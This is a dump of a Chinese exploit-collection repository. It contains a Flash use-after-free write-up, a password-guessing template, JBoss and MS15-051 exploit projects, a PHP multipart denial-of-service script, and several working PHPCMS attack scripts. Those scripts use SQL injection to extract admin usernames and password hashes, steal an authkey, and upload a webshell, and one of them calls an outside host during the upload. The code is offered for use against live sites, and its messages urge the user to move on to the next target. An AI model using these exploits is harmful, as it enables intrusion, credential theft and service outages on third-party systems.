https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/flash0day/exp1/exp1.fla -------------------------------------------------------------------------------- /flash0day/exp1/exp1.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/flash0day/exp1/exp1.swf -------------------------------------------------------------------------------- /flash0day/read me.txt: -------------------------------------------------------------------------------- 1 | 1. BACKGROUND 2 | http://en.wikipedia.org/wiki/Adobe_Flash_Player 3 | 4 | Congrats! You are reading about the most beautiful Flash bug for the last four 5 | years since CVE-2010-2161. 6 | 7 | 8 | 2. 
DESCRIPTION 9 | 10 | The use-after-free vulnerability exists inside the built-in ByteArray class 11 | http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/ByteArray.html 12 | 13 | Let's create a simple ByteArray object: 14 | 15 | var ba:ByteArray = new ByteArray(); 16 | ba.length = 8; 17 | ba[1] = 1; 18 | 19 | Now we can access ba[] items and write numeric byte values into ba[]. 20 | We are also allowed to write objects into a ByteArray. For example: 21 | 22 | var obj = new MyClass(); 23 | ba[0] = obj; 24 | 25 | AS3 will try to implicitly convert the MyClass object into a numeric value by 26 | calling the MyClass.valueOf() method. This method can be easily redefined 27 | within the user's code: 28 | 29 | class MyClass 30 | { 31 | prototype.valueOf = function() 32 | { 33 | ba.length = 88; // reallocate ba[] storage 34 | return 0; // return byte for ba[offset] 35 | } 36 | } 37 | 38 | Let's see how that implicit conversion occurs inside the native code: 39 | 40 | push esi 41 | mov eax, [esp+8] // the offset value from "ba[offset] = obj" 42 | push eax 43 | add ecx, 0x18 // ecx = this = "ba" object pointer 44 | call ByteArray.getStorage() // gets ba[offset] storage pointer and 45 | mov esi, eax // saves it in esi 46 | 47 | mov ecx, [esp+0xC] // "obj" pointer 48 | push ecx 49 | call AvmCore.toInteger() // call MyClass.valueOf() 50 | add esp,4 51 | mov [esi], al // writes returned byte into array 52 | 53 | pop esi 54 | ret 8 55 | 56 | In a high-level language this looks roughly like: 57 | 58 | void ByteArray.setObjInternal(int offset, obj) 59 | { 60 | byte* dest = this.getStorage(offset); 61 | *dest = toInteger(obj); // valueOf() runs here, after dest was computed and is never re-validated 62 | } 63 | 64 | So the array storage pointer is saved in a local variable, then AS3 valueOf() is 65 | invoked from the native code, and the returned byte is written through the saved 66 | destination pointer at the end. 
If valueOf() changes the length of the byte array (see above) 67 | and reallocates its internal storage, then the local destination pointer becomes 68 | stale, and the final write through it is a use-after-free memory corruption. 69 | 70 | Using this vulnerability, it's very easy to control what byte will be written 71 | and at which offset this corruption will occur. 72 | 73 | 74 | 3. AFFECTED SOFTWARE 75 | Adobe Flash Player 9 and higher (unpatched builds current when this was written; check the exact build you are testing against) 76 | 77 | 78 | 4. TESTING 79 | Open the test "calc.htm" file in your browser and press the button. Do this only in an isolated, disposable VM: the page runs a native payload (CreateProcessA / vfork, see below) inside the browser process. 80 | 81 | on Windows: 82 | Calc.exe should pop up in desktop IE. 83 | Calc.exe should be run as a non-GUI child process in metro IE. 84 | Payload returns 0 from CreateProcessA("calc.exe") inside the Chrome/FF sandbox. 85 | 86 | on OS X: 87 | Calculator is launched in FF or the standalone Flash Player projector. 88 | Payload returns 1 from vfork() in the Safari sandbox. 89 | 90 | 91 | -------------------------------------------------------------------------------- /fuzzerpwd/FuzzerPwd.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/fuzzerpwd/FuzzerPwd.py -------------------------------------------------------------------------------- /fuzzerpwd/README.md: -------------------------------------------------------------------------------- 1 | ##使用方法:## 2 | * python FuzzerPwd.py 3 | * 请输入Fuzzer密码的关键字[多个关键字","隔开]:word1,word2,word3 4 | 5 | ##程序步骤:## 6 | * 1.读取密码模板文件pwd.yx 7 | * 2.将关键字替换模板文件内容 8 | * 3.Fuzzer出结果,输出到password.txt文件中 9 | 10 | -------------------------------------------------------------------------------- /fuzzerpwd/password.txt: -------------------------------------------------------------------------------- 1 | 123 -------------------------------------------------------------------------------- /fuzzerpwd/pwd.yx: -------------------------------------------------------------------------------- 1 | %username% 2 | 
%username%1 3 | %username%12 4 | %username%123 5 | %username%1234 6 | %username%12345 7 | %username%123456 8 | %username%@123 9 | %username%@123.com 10 | %username%@163 11 | %username%@163.com 12 | %username%163 13 | %username%8 14 | %username%88 15 | %username%888 16 | %username%999 17 | %username%666 18 | %username%@2008 19 | %username%@2009 20 | %username%@2010 21 | %username%@2011 22 | %username%@2012 23 | %username%@2013 24 | %username%@2014 25 | %username%@2015 26 | %username%!@# 27 | %username%. 28 | %username%.. 29 | %username%... 30 | %username%1qa 31 | %username%2ws 32 | %username%3ed 33 | %username%test 34 | %username%#test# 35 | testtest 36 | testtest. 37 | testtest.. 38 | testtest... -------------------------------------------------------------------------------- /jboss_exp/jboss_exploit_fat.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/jboss_exp/jboss_exploit_fat.jar -------------------------------------------------------------------------------- /jboss_exp/test.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/jboss_exp/test.war -------------------------------------------------------------------------------- /jboss_exp/使用说明.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/jboss_exp/使用说明.txt -------------------------------------------------------------------------------- /ms15-051(修改版)/ms15-051/ms15-051.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 11.00 3 | # Visual Studio 2010 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ms15-051", "ms15-051\ms15-051.vcxproj", 
"{6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Release|Win32 = Release|Win32 9 | Release|x64 = Release|x64 10 | Release32|Win32 = Release32|Win32 11 | Release32|x64 = Release32|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release|Win32.ActiveCfg = Release|Win32 15 | {6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release|Win32.Build.0 = Release|Win32 16 | {6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release|x64.ActiveCfg = Release|x64 17 | {6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release|x64.Build.0 = Release|x64 18 | {6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release32|Win32.ActiveCfg = Release32|Win32 19 | {6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release32|Win32.Build.0 = Release32|Win32 20 | {6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release32|x64.ActiveCfg = Release|Win32 21 | {6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99}.Release32|x64.Build.0 = Release|Win32 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /ms15-051(修改版)/ms15-051/ms15-051.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/ms15-051/ms15-051.suo -------------------------------------------------------------------------------- /ms15-051(修改版)/ms15-051/ms15-051/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | 控制台应用程序:ms15-051 项目概述 3 | ======================================================================== 4 | 5 | 应用程序向导已为您创建了此 ms15-051 应用程序。 6 | 7 | 本文件概要介绍组成 ms15-051 应用程序的每个文件的内容。 8 | 9 | 10 | ms15-051.vcxproj 11 | 
这是使用应用程序向导生成的 VC++ 项目的主项目文件, 12 | 其中包含生成该文件的 Visual C++ 13 | 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。 14 | 15 | ms15-051.vcxproj.filters 16 | 这是使用“应用程序向导”生成的 VC++ 项目筛选器文件。 17 | 它包含有关项目文件与筛选器之间的关联信息。 在 IDE 18 | 中,通过这种关联,在特定节点下以分组形式显示具有相似扩展名的文件。 19 | 例如,“.cpp”文件与“源文件”筛选器关联。 20 | 21 | ms15-051.cpp 22 | 这是主应用程序源文件。 23 | 24 | ///////////////////////////////////////////////////////////////////////////// 25 | 其他标准文件: 26 | 27 | StdAfx.h,StdAfx.cpp 28 | 这些文件用于生成名为 ms15-051.pch 的预编译头 (PCH) 文件和 29 | 名为 StdAfx.obj 的预编译类型文件。 30 | 31 | ///////////////////////////////////////////////////////////////////////////// 32 | 其他注释: 33 | 34 | 应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。 35 | 36 | ///////////////////////////////////////////////////////////////////////////// 37 | -------------------------------------------------------------------------------- /ms15-051(修改版)/ms15-051/ms15-051/Win32/ms15-051.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/ms15-051/ms15-051/Win32/ms15-051.exe -------------------------------------------------------------------------------- /ms15-051(修改版)/ms15-051/ms15-051/ms15-051.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/ms15-051/ms15-051/ms15-051.cpp -------------------------------------------------------------------------------- /ms15-051(修改版)/ms15-051/ms15-051/ms15-051.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Release32 6 | Win32 7 | 8 | 9 | Release32 10 | x64 11 | 12 | 13 | Release 14 | Win32 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {6AF1D0F2-9FFE-46E9-A8F1-1E2DB2E6CE99} 23 | Win32Proj 24 | ms15051 25 | 26 | 27 | 28 | Application 29 | false 30 | true 31 | Unicode 32 | 33 | 34 | Application 35 | false 36 | true 37 
| Unicode 38 | 39 | 40 | Application 41 | false 42 | true 43 | Unicode 44 | 45 | 46 | Application 47 | false 48 | true 49 | Unicode 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | false 69 | $(Platform)\ 70 | $(Platform)\ 71 | 72 | 73 | false 74 | false 75 | $(SolutionDir)\OutPut\$(Platform) 76 | $(SolutionDir)\Temp 77 | $(ProjectName) 78 | 79 | 80 | false 81 | $(Platform)\ 82 | $(Platform)\ 83 | $(ProjectName) 84 | false 85 | 86 | 87 | false 88 | 89 | 90 | 91 | Level3 92 | 93 | 94 | MaxSpeed 95 | true 96 | true 97 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 98 | MultiThreaded 99 | 100 | 101 | Console 102 | true 103 | true 104 | true 105 | ntdll.lib;%(AdditionalDependencies) 106 | 107 | 108 | 109 | 110 | Level3 111 | 112 | 113 | MaxSpeed 114 | true 115 | true 116 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 117 | MultiThreaded 118 | 119 | 120 | Console 121 | false 122 | true 123 | true 124 | ntdll.lib;%(AdditionalDependencies) 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | _WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | MultiThreaded 137 | 138 | 139 | Console 140 | false 141 | true 142 | true 143 | ntdll64.lib;%(AdditionalDependencies) 144 | 145 | 146 | 147 | 148 | Level3 149 | 150 | 151 | MaxSpeed 152 | true 153 | true 154 | _WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 155 | MultiThreaded 156 | 157 | 158 | Console 159 | true 160 | true 161 | true 162 | ntdll64.lib;%(AdditionalDependencies) 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | -------------------------------------------------------------------------------- /ms15-051(修改版)/ms15-051/ms15-051/ms15-051.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | 
h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 源文件 23 | 24 | 25 | -------------------------------------------------------------------------------- /ms15-051(修改版)/ms15-051/ms15-051/ms15-051.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /ms15-051(修改版)/ms15-051/ms15-051/ntdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/ms15-051/ms15-051/ntdll.lib -------------------------------------------------------------------------------- /ms15-051(修改版)/ms15-051/ms15-051/ntdll64.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/ms15-051/ms15-051/ntdll64.lib -------------------------------------------------------------------------------- /ms15-051(修改版)/ms15-051/ms15-051/x64/ms15-051.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/ms15-051/ms15-051/x64/ms15-051.exe -------------------------------------------------------------------------------- /ms15-051(修改版)/ms15-051修正版.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/ms15-051修正版.txt -------------------------------------------------------------------------------- /ms15-051(修改版)/pic.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ms15-051(修改版)/pic.png -------------------------------------------------------------------------------- /php/phpdos.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Author: Shusheng Liu,The Department of Security Cloud, Baidu 3 | email: liusscs@163.com 4 | /* */ 5 | ''' 6 | import sys 7 | import urllib,urllib2 8 | import datetime 9 | from optparse import OptionParser 10 | 11 | def http_proxy(proxy_url): 12 | 13 | proxy_handler = urllib2.ProxyHandler({"http" : proxy_url}) 14 | null_proxy_handler = urllib2.ProxyHandler({}) 15 | opener = urllib2.build_opener(proxy_handler) 16 | urllib2.install_opener(opener) 17 | #end http_proxy 18 | 19 | def check_php_multipartform_dos(url,post_body,headers): 20 | req = urllib2.Request(url) 21 | for key in headers.keys(): 22 | req.add_header(key,headers[key]) 23 | starttime = datetime.datetime.now(); 24 | fd = urllib2.urlopen(req,post_body) 25 | html = fd.read() 26 | endtime = datetime.datetime.now() 27 | usetime=(endtime - starttime).seconds 28 | if(usetime > 5): 29 | result = url+" is vulnerable"; 30 | else: 31 | if(usetime > 3): 32 | result = "need to check normal respond time" 33 | return [result,usetime] 34 | #end 35 | 36 | 37 | def main(): 38 | #http_proxy("http://127.0.0.1:8089") 39 | parser = OptionParser() 40 | parser.add_option("-t", "--target", action="store", 41 | dest="target", 42 | default=False, 43 | type="string", 44 | help="test target") 45 | (options, args) = parser.parse_args() 46 | if(options.target): 47 | target = options.target 48 | else: 49 | return; 50 | 51 | Num=350000 52 | headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1', 53 | 'Accept-Encoding':'gzip, deflate', 54 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'} 55 | body = 
"------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg" 56 | payload="" 57 | for i in range(0,Num): 58 | payload = payload + "a\n" 59 | body = body + payload; 60 | body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--" 61 | print "starting..."; 62 | respond=check_php_multipartform_dos(target,body,headers) 63 | print "Result : " 64 | print respond[0] 65 | print "Respond time : "+str(respond[1]) + " seconds"; 66 | 67 | if __name__=="__main__": 68 | main() -------------------------------------------------------------------------------- /phpcms/PHPCMS2008_comment_注入.php: -------------------------------------------------------------------------------- 1 | ' . get_info($admin) . PHP_EOL; 57 | } 58 | } else { 59 | echo '报告爷,此站不存在此漏洞,请秒下一个!' . PHP_EOL; 60 | } 61 | //发送数据包函数 62 | function send_pack($exp) 63 | { 64 | global $host, $path; 65 | $data = "GET " . $path . "/comment/comment.php?action=vote HTTP/1.1\r\n"; 66 | $data .= "Host: $host\r\n"; 67 | //$data .= "User-Agent: Baiduspider\r\n"; 68 | $data .= "Cookie: $exp\r\n"; 69 | $data .= "Connection: Close\r\n\r\n"; 70 | //echo $data; 71 | $fp = @fsockopen($host, 80, $errno, $errstr, 10); 72 | //echo ini_get('default_socket_timeout');//默认超时时间为60秒 73 | if (!$fp) { 74 | echo $errno . '-->' . $errstr . "\n"; 75 | exit('Could not connect to: ' . 
$host); 76 | } else { 77 | fwrite($fp, $data); 78 | $back = ''; 79 | while (!feof($fp)) { 80 | $back .= fread($fp, 1024); 81 | } 82 | fclose($fp); 83 | } 84 | return $back; 85 | } 86 | 87 | //提取返回信息 88 | function get_info($info) 89 | { 90 | preg_match('/~(.*)~1/i', send_pack($info), $admin_match); 91 | if (preg_match('/charset=utf-8/i', send_pack($info))) { 92 | return iconv('utf-8', 'gbk//IGNORE', $admin_match[1]); 93 | } else { 94 | return $admin_match[1]; 95 | } 96 | } 97 | 98 | //时间统计函数 99 | function func_time() 100 | { 101 | list($microsec, $sec) = explode(' ', microtime()); 102 | return $microsec + $sec; 103 | } 104 | 105 | echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。'; 106 | ?> 107 | -------------------------------------------------------------------------------- /phpcms/PHPCMS_V9 AuthKey泄露导致注入EXP.php: -------------------------------------------------------------------------------- 1 | $admin) { 41 | echo '管理员' . ($num + 1) . ' => ' . $admin . PHP_EOL; 42 | } 43 | } else { 44 | exit('杯具了大爷,此站漏洞已经修补,请秒下一个!'); 45 | } 46 | //发送数据包函数 47 | function get_data($target) 48 | { 49 | //控制http发包参数 50 | global $cookie; 51 | $opts = array( 52 | 'http' => array( 53 | 'method' => "GET", 54 | 'timeout' => 30, 55 | 'header' => "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0\r\n" . 56 | "Cookie: $cookie\r\n" 57 | ) 58 | ); 59 | $context = stream_context_create($opts); 60 | $content = file_get_contents($target, false, $context); 61 | return $content; 62 | } 63 | 64 | //获取authkey函数 65 | function authkey() 66 | { 67 | $authkey = ''; 68 | global $phpcmsv9; 69 | $avatar_url = $phpcmsv9 . 
'index.php?m=member&c=index&a=account_manage_avatar&t=1'; 70 | $upurl = get_data($avatar_url); 71 | if (preg_match('/\'upurl\':"(.+?)&callback=return_avatar/', $upurl, $match)) { 72 | $key_url = base64_decode($match[1]); 73 | $key_url = str_replace('uploadavatar', 'getapplist', $key_url); 74 | $auth_url = get_data($key_url); 75 | if (preg_match('/"authkey";s:32:"(.*?)"/', $auth_url, $au_match)) { 76 | echo '成功获取到AuthKey:' . $au_match[1] . "\n\n"; 77 | $authkey = $au_match[1]; 78 | } 79 | } 80 | return $authkey; 81 | } 82 | 83 | //SQL注入函数 84 | function sql_inject() 85 | { 86 | global $phpcmsv9; 87 | $limit = 10; //默认显示多少个管理员账号 88 | $admin = array(); 89 | $key = authkey(); 90 | for ($i = 0; $i < $limit; $i++) { 91 | $code = sys_auth("action=synlogin&uid=1' and(select 1 from(select count(*),concat((select (select ( 92 | SELECT distinct concat(0x7e,username,0x3a,password,0x3a,encrypt,0x7e)FROM v9_admin limit $i,1)) from 93 | information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#", 'ENCODE', $key); 94 | $target = $phpcmsv9 . '/api.php?op=phpsso&code=' . $code; 95 | #$target = $phpcmsv9 . 'phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=' . $code; 96 | $content = get_data($target); 97 | if (preg_match('/~(.+?)~1/', $content, $match)) { 98 | $admin[] = $match[1]; 99 | } else { 100 | break; 101 | } 102 | } 103 | return $admin; 104 | } 105 | 106 | //phpcms authkey加密函数 107 | function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) 108 | { 109 | $key_length = 4; 110 | $key = md5($key); 111 | $fixedkey = hash('md5', $key); 112 | $egiskeys = md5(substr($fixedkey, 16, 16)); 113 | $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length)) : ''; 114 | $keys = hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16)); 115 | $string = $operation == 'ENCODE' ? 
sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length)); 116 | $i = 0; 117 | $result = ''; 118 | $string_length = strlen($string); 119 | for ($i = 0; $i < $string_length; $i++) { 120 | $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32})); 121 | } 122 | if ($operation == 'ENCODE') { 123 | return $runtokey . str_replace('=', '', base64_encode($result)); 124 | } else { 125 | if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $egiskeys), 0, 16)) { 126 | return substr($result, 26); 127 | } else { 128 | return ''; 129 | } 130 | } 131 | } 132 | 133 | //时间统计函数 134 | function func_time() 135 | { 136 | list($microsec, $sec) = explode(' ', microtime()); 137 | return $microsec + $sec; 138 | } 139 | 140 | echo "\n脚本执行时间:" . round((func_time() - $start_time), 4) . '秒'; 141 | -------------------------------------------------------------------------------- /phpcms/PHPCMS_V9 authkey来getshell.php: -------------------------------------------------------------------------------- 1 | 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $egiskeys), 0, 16)) { 35 | return substr($result, 26); 36 | } else { 37 | return ''; 38 | } 39 | } 40 | } 41 | ?> 42 | -------------------------------------------------------------------------------- /phpcms/PHPCMS中转脚本.php: -------------------------------------------------------------------------------- 1 | 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . 
$egiskeys), 0, 16)) { 35 | return substr($result, 26); 36 | } else { 37 | return ''; 38 | } 39 | } 40 | } 41 | ?> 42 | -------------------------------------------------------------------------------- /phpcms/Phpcms V9 Upfile%20 Exp.php: -------------------------------------------------------------------------------- 1 | '; 30 | $file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php'; 31 | if($ret=Create_dir($url,$path)) 32 | { 33 | //echo $ret; 34 | $pattern = "|Server:[^,]+?|U"; 35 | preg_match_all($pattern, $ret, $matches); 36 | if($matches[0][0]) 37 | { 38 | if(strpos($matches[0][0],'Apache') == false) 39 | { 40 | echo "\nÇ×£¡ŽËÍøÕŸ²»ÊÇapacheµÄÍøÕŸ¡£\n";exit; 41 | } 42 | } 43 | $ret = GetShell($url,$phpshell,$path,$file); 44 | $pattern = "|http:\/\/[^,]+?\.,?|U"; 45 | preg_match_all($pattern, $ret, $matches); 46 | if($matches[0][0]) 47 | { 48 | echo "\n".'ÃÜÂëΪ: '.$pass."\n"; 49 | echo "\r\nurlµØÖ·: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit; 50 | } 51 | else 52 | { 53 | $pattern = "|\/uploadfile\/[^,]+?\.,?|U"; 54 | preg_match_all($pattern, $ret, $matches); 55 | if($matches[0][0]) 56 | { 57 | echo "\n".'ÃÜÂëΪ: '.$pass."\n"; 58 | echo "\r\nurlµØÖ·:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit; 59 | } 60 | else 61 | { 62 | echo "\r\nûµÃµœ£¡\n";exit; 63 | } 64 | } 65 | } 66 | 67 | function GetShell($url,$shell,$path,$js) 68 | { 69 | $content =$shell; 70 | $data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." 
HTTP/1.1\r\n"; 71 | $data .= "Host: ".$url."\r\n"; 72 | $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n"; 73 | $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; 74 | $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n"; 75 | $data .= "Connection: close\r\n"; 76 | $data .= "Content-Length: ".strlen($content)."\r\n\r\n"; 77 | $data .= $content."\r\n"; 78 | $ock=fsockopen($url,80); 79 | if (!$ock) 80 | { 81 | echo "\n"."ŽËÍøÕŸÃ»ÓлØÓŠ,Œì²âurlÊÇ·ñÊäÈëÕýÈ·"."\n";exit; 82 | } 83 | else 84 | { 85 | fwrite($ock,$data); 86 | $resp = ''; 87 | while (!feof($ock)) 88 | { 89 | $resp.=fread($ock, 1024); 90 | } 91 | return $resp; 92 | } 93 | } 94 | 95 | function Create_dir($url,$path='') 96 | { 97 | $content ='I love you'; 98 | $data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n"; 99 | $data .= "Host: ".$url."\r\n"; 100 | $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n"; 101 | $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; 102 | $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n"; 103 | $data .= "Connection: close\r\n"; 104 | $data .= "Content-Length: ".strlen($content)."\r\n\r\n"; 105 | $data .= $content."\r\n"; 106 | $ock=fsockopen($url,80); 107 | if (!$ock) 108 | { 109 | echo "\n"."ŽËÍøÕŸÃ»ÓлØÓŠ,Œì²âurlÊÇ·ñÊäÈëÕýÈ·"."\n";exit; 110 | } 111 | fwrite($ock,$data); 112 | $resp = ''; 113 | while (!feof($ock)) 114 | { 115 | $resp.=fread($ock, 1024); 116 | } 117 | return $resp; 118 | } 119 | ?> 120 | -------------------------------------------------------------------------------- /phpcms/Phpcms V9 uc api SQL Exp.php: -------------------------------------------------------------------------------- 1 | 126 )) 37 | {$result.=" .";} 38 | else 39 | {$result.=" ".$string[$i];} 40 | if 
(strlen(dechex(ord($string[$i])))==2) 41 | {$exa.=" ".dechex(ord($string[$i]));} 42 | else 43 | {$exa.=" 0".dechex(ord($string[$i]));} 44 | $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} 45 | } 46 | return $exa."\r\n".$result; 47 | } 48 | $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; 49 | 50 | function send($packet) 51 | { 52 | global $proxy, $host, $port, $html, $proxy_regex; 53 | if ($proxy=='') { 54 | $ock=fsockopen(gethostbyname($host),$port); 55 | if (!$ock) { 56 | echo 'No response from '.$host.':'.$port; die; 57 | } 58 | } 59 | else { 60 | $c = preg_match($proxy_regex,$proxy); 61 | if (!$c) { 62 | echo 'Not a valid proxy...';die; 63 | } 64 | $parts=explode(':',$proxy); 65 | $parts[1]=(int)$parts[1]; 66 | echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; 67 | $ock=fsockopen($parts[0],$parts[1]); 68 | if (!$ock) { 69 | echo 'No response from proxy...';die; 70 | } 71 | } 72 | fputs($ock,$packet); 73 | if ($proxy=='') { 74 | $html=''; 75 | while (!feof($ock)) { 76 | $html.=fgets($ock); 77 | } 78 | } 79 | else { 80 | $html=''; 81 | while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { 82 | $html.=fread($ock,1); 83 | } 84 | } 85 | fclose($ock); 86 | } 87 | 88 | $host=$argv[1]; 89 | $path=$argv[2]; 90 | $port=80; 91 | $proxy=""; 92 | for ($i=3; $i<$argc; $i++){ 93 | $temp=$argv[$i][0].$argv[$i][1]; 94 | if ($temp=="-p") 95 | { 96 | $port=(int)str_replace("-p","",$argv[$i]); 97 | } 98 | if ($temp=="-P") 99 | { 100 | $proxy=str_replace("-P","",$argv[$i]); 101 | } 102 | } 103 | 104 | if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} 105 | if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} 106 | 107 | function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { 108 | 109 | $ckey_length = 4; 110 | 111 | $key = md5($key ? 
